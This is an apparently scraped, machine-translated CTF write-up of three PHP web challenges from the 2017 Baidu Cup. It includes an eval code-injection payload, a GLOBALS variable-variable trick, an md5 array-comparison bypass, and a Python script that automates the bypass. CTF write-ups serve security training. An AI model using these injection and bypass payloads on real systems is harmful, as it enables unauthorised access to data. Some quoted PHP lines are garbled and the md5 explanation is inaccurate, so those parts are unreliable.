"Baidu Cup" CTF Competition 2017 February (Misc Web)

Others 2022-04-21 22:02:30 views: 0

  • Blast-1 :

Open the link, it's 502

I add a variable to pass parameters directly behind: ?a=1

out a piece of code

In the var_dump() function, $$a is used, and the super global variable GLOBALS may be used

Pass a GLOBALS to the hello parameter

get flag

  • Blast-2 :

open link

var_dump() will return the type and value of the data variable

eval() will treat the string as php code

There are two ways to get the flag

1:?hello=file('flag.php')

2:?hello=);show_source('flag.php');var_dump(

  • Blast-3 :

Open the link, or php code

<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$ str_rands = $ str_rand [mt_rand (0.25)]. $ str_rand [mt_rand (0.25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $ str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

Key points:

The value of the variable str_rand is 2 lowercase letters

If the value of the whoami parameter in SESSIONS is equal to the value of the parameter value, and the 5th bit of the variable value processed by the md5() function is equal to 0 and the next 4 bits are equal to 0, nums will increase by 1, and the value of whoami will also be updated. If nums is greater than 10, you can get the flag

Arrays can bypass this judgment of md5, because the md5() function will return null when processing an array, null==0

The first parameter is passed, ?value[]=ea

The second parameter is passed, ?value[]=mj, and so on

You can write a python script to run it

import requests

s = requests.session()

strs = ['abcdefghijklmnopqrstuvwxyz']

url = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=ea"
r = s.get(url)

for i in range(10):
    url_1 = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=" + r.text[:2]
    r = s.get(url_1)
    print(r.url)
    if 'flag{' in r.text:
    	print(r.text)

operation result

get flag

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324611294&siteId=291194637
Recommended
Ranking
[Algorithm] greedy _ program scheduling issues
Spring 控制反转(IOC)
Data structure-6.6 figure
Indicates that the class or member method has abstract properties
Huawei v5 server installed Linux operating system
Postgresql source code analysis - creating ordinary tables
Chapter 10 Evaluation Classification Results
Cloud service Ubuntu 20.04 version uses Nginx to deploy static web pages
Java Exercise 17.1
Solve the problem that git cannot automatically push submission in IDEA Push failed: Failed with error: Could not read from remote repository.
Daily
More
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)

Code World

© 2018 codetd.com